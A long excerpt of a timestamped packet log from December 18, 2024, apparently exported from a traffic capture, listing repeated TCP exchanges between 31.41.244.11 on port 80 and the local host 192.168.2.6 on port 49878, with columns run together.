                                                                                                                                                              Dec 18, 2024 11:47:46.395301104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.395324945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.395325899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.395680904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.396816969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.396833897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.396872997 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.398689032 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.398701906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.398715019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.398787022 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.399943113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.399957895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.399971962 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.399990082 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.400010109 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.402195930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.402213097 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.402225971 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.402250051 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.402276993 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.402333021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.402369022 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.404505968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.404522896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.404535055 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.404560089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.404582977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.405051947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.405261993 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.406822920 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.406836033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.406847954 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.406868935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.406896114 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.407977104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.408000946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.408041954 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.409037113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.409234047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.409246922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.409282923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.409303904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.411432028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.411449909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.411489010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.411499023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.411726952 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.411789894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.412134886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.412746906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.412759066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.412798882 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.412825108 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.415071011 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.415087938 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.415102005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.415132046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.415153027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.416405916 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.416421890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.416435003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.416454077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.416467905 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.418701887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.418718100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.418731928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.418755054 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.418776989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.419819117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.419836044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.419891119 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.420396090 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.421674967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.421690941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.422004938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.422504902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.422519922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.422568083 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.424124956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.424141884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.424170971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.424185038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.424599886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.424612045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.424650908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.426755905 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.426773071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.426785946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.426805973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.426832914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.427961111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.427978039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.427990913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.428011894 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.428025961 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.429734945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.429750919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.429783106 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.429797888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.431379080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.431394100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.431407928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.431428909 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.431458950 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.432708979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.432727098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.432740927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.432758093 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.432776928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.434302092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.434319973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.434351921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.434374094 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.564439058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.564527035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.564604998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.564636946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.565010071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.565052032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.565080881 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.565119028 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.566240072 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.566278934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.566430092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.566469908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.567369938 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.567409992 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.567728996 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.567770958 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.567796946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.567833900 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.568914890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.568958044 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.569015026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.569052935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.570059061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.570101976 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.570125103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.570161104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.571283102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.571326971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.571392059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.571433067 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.572468042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.572511911 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.572560072 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.572593927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.573626995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.573667049 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.573721886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.573759079 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.574875116 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.574915886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.575023890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.575061083 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.575912952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.575953960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.576025963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.576060057 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.577116013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.577157974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.577313900 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.577349901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.578341007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.578382015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.578458071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.578495026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.579530001 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.579570055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.579750061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.579787016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.580641031 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.580683947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.580697060 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.580733061 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.581809998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.581855059 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.581892967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.581929922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.582957029 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.583002090 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.583183050 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.583229065 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.584134102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.584176064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.584212065 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.584250927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.585299969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.585345030 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.585463047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.585500002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.586458921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.586503029 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.586529016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.586565018 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.587647915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.587690115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.587724924 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.587762117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.588754892 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.588797092 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.588918924 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.588957071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.589942932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.590032101 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.590061903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.590159893 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.591133118 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.591175079 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.591212034 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.591257095 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.592459917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.592504978 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.592626095 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.592664003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.594208956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.594252110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.594297886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.594335079 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.595169067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.595207930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.595247984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.595282078 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.596137047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.596178055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.596218109 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.596254110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.597070932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.597110033 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.597135067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.597171068 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.598129988 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.598169088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.598237038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.598273993 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.599349022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.599390984 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.599479914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.599518061 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.600537062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.600575924 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.600657940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.600697994 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.601655960 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.601699114 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.601857901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.601897001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.602869034 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.602916002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.602932930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.602968931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.604038000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.604084015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.604162931 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.604199886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.605156898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.605201006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.605268002 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.605304003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.606343985 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.606393099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.606431961 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.606468916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.607481003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.607525110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.607577085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.607614040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.608661890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.608705044 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.608761072 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.608795881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.609822989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.609872103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.609939098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.609978914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.611016989 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.611052990 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.611171961 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.611207008 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.612145901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.612188101 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.612283945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.612319946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.613363981 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.613408089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.613446951 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.613482952 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.614506960 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.614548922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.614619970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.615156889 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.615684986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.615725040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.615782022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.615817070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.616981983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.617028952 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.617064953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.617100954 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.618009090 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.618053913 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.618244886 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.618282080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:46.619292974 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:46.619339943 CET4987880192.168.2.631.41.244.11
